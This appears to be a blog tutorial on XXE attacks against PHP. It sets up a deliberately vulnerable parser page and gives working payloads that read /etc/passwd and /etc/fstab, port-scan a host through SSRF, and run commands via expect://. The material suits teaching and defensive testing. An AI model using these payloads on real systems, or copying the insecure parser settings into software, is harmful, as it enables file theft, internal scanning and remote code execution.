For demonstration purpose we use below php code as a parser. The i am using Ubuntu 16.4 server VM with php 5.6.
<html>
<head>
<title>XML Parser</title>
</head>
<body>
<h2>Enter XML Code Here :</h2>
<form action="" method="post">
<textarea name="xml" rows="10" cols="50"></textarea><br/>
<input type="submit" value="Submit"/>
</form>
<?php
if(!empty($_POST["xml"])) {
libxml_disable_entity_loader (false);
$xmlfile = $_POST["xml"];
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$book = simplexml_import_dom($dom);
$name = $book->name;
$author = $book->author;
$price = $book->price;
echo "Book Details<br/><br/>Name : $name<br/>Author : $author<br/>Price : $price/-";
}
?>
</body>
</html>
As we can see above the php code will parse our xml input and print the values of elements.
XXE Attacks :
As we know that when the external entity is used in the xml document then the xml parser reads the data from given URI and permits it to be included within the document. At this point an attacker could sent some malicious data which could force the xml parser to access the resource specified by him which could be a system files, folders, remote system or in some cases even execute remote command on the system. Now lets see some examples of it.
Reading System Files :
To read system files we have to replace the URI field of external entity with the path of system file.
<!ENTITY data SYSTEM "file:///Path_of_file"><?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE book [ <!ENTITY data SYSTEM "file:///etc/passwd"> ]> <book> <name>&data;</name> <author>Nobody</author> <price>0000</price> </book>Output :
Similarly we can read other files as will, if it is permitted. Some examples are :
<!ENTITY data SYSTEM "file:///etc/lsb-release">
Encoding Output to Base64 :
Sometimes if the file contains special characters like "<", ">", "/" etc, then the parser will try to parse it as xml code and the output is not displayed. For example the "/etc/fstab" file contains these special characters, and when we try to read "/etc/fstab" file, then there is nothing shown because of the error.
<!ENTITY data SYSTEM "file:///etc/fstab">php://filter/read=convert.base64-encode/resource=/path_of_the_fileNow the xml code will be :
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE book [ <!ENTITY data SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/fstab"> ]> <book> <name>&data;</name> <author>Nobody</author> <price>0000</price> </book>Output :
And we can decode it, and see the content of file.
Although, there are some limitations of XXE attack, for example it can not be used to obtain or read binary files.
Port Scanning with XXE :
It is a combination of XXE and SSRF (Server Side Request Fergory) Attack. In this attack we make the xml parser to scan ports (or try to connect to that port on the remote server) for us. Also note that this works only if PHP servers shows the warning, either you don't see the results(I enable the warning on my php setup). Now we need to provide the URI of the remote host with the port number.
<!ENTITY scan SYSTEM "http://scanme.nmap.org:22">The above syntax scan the port 22 of scanme.namp.org. Exmaple :
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE book [ <!ENTITY scan SYSTEM "http://scanme.nmap.org:22/"> ]> <book> <name>&scan;</name> <author>Nobody</author> <price>0000</price> </book>Output :
And as we can see it shows the SSH Banner, which means port 22 is open. And for the closed port the warning will be like this :
Remote Code Execution :
If the expect module is installed and enabled on the php server, then we can execute code on the web server.
"expect://<command_to_execute>"Example :
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE book [ <!ENTITY cmd SYSTEM "expect://id"> ]> <book> <name>&cmd;</name> <author>Nobody</author> <price>0000</price> </book>
Conclusion :
In next post are going to look how to perform DOS (Denial Of Service) attacks with XXE.
XML Attacks Part 1 : Basic of XML structure and attack surface
XML Attacks Part 3 : Denial Of Service Attacks
XML Attacks Part 4 : Out Of Bound Attacks
Visit the link for more tutorials about Web Security : http://www.sec-art.net/p/web-security.html